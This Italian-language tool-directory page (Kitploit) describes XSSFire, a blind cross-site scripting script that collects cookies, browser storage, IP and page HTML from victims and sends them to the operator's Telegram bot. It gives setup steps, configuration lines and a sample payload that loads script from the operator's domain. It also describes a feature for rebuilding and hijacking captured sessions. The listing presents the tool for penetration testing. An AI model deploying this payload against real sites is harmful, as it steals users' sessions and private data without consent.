Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSSFire — Uno script autonomo per Blind XSS. | Kitploit
Strumenti/GitHubGitHub/seifelsallamy/xssfire
ExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniSicurezza WebPenetration Testing
GitHubseifelsallamy/xssfire

XSSFire

Uno script autonomo per Blind XSS.

Vedi Repository
471041 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

XSSFire

Uno script standalone per Blind XSS.

Come funziona:

Lo script è una combinazione di PHP e JavaScript: cattura i dati usando JS e li invia allo script stesso, che poi genera file di report e li consegna tramite Telegram.

Requisiti:

  1. Web Server su Linux con un dominio e un certificato SSL.
  2. Account Telegram (per ricevere i report BXSS)

Perché Telegram?

Facile da configurare. Veloce. Raggiungibile.

Funzionalità:

  1. Cattura: IP, User-Agent, Data-Ora, Local Storage, Session Storage, Cookie, Referrer, Origin, URL, HTML, se innescato da un Iframe
  2. Session Builder: Uno JavaScript in grado di ricostruire la sessione: apri l'URL catturato e i devtools, incollalo nella console e premi invio. Se sei abbastanza fortunato puoi prendere il controllo della sessione.
  3. Notifiche Telegram: Più veloci e facili da configurare rispetto alle e-mail e più raggiungibili.
  4. Anti-Spam: Dovresti ricevere solo una/due notifiche per ogni URL catturato. Tuttavia, lo script si resetta di tanto in tanto per notificarti di nuovo in seguito.
  5. Crittografia: Puoi impostare una password nello script e il report che ricevi su Telegram sarà un file zip protetto da password. (I bot di Telegram non usano la crittografia end-to-end).
  6. Snapshot HTML: È un file HTML che verrà consegnato con il report; dovrebbe apparire simile alla pagina del tuo target.

Configurazione:

  1. Vai su Telegram e avvia una chat con @botfather.
  2. Scrivi /start nella chat e crea un nuovo bot.
  3. Dovresti ricevere il token del tuo bot quando lo crei.
Scarica lo strumento
  • Metti da parte il token.
  • Ora vai alla chat del tuo bot appena creato, avviala e salutalo.
  • Poi vai su: https://api.telegram.org/bot<bot_token>/getUpdates
  • E salva il tuo chat id.
  • Apri lo script XSSFire e modifica le seguenti righe:
  • root@kitploit:~
    $chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
    $token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
    $password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
    
    1. Carica lo script sul tuo server.

    Per generare i payload puoi prendere in considerazione il Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager Puoi semplicemente creare i payload tramite questa estensione inserendo yourdomain.com/

    Nota: puoi cambiare il nome del file in index.php e caricarlo nella directory principale del tuo server per rendere i payload più corti; in tal caso il payload dovrebbe assomigliare a questo <script src="https://yourdomain.com"></script>.

    Snapshot:

    bxss
    bxss2
    bxss3

    Grazie a GPT-3 xD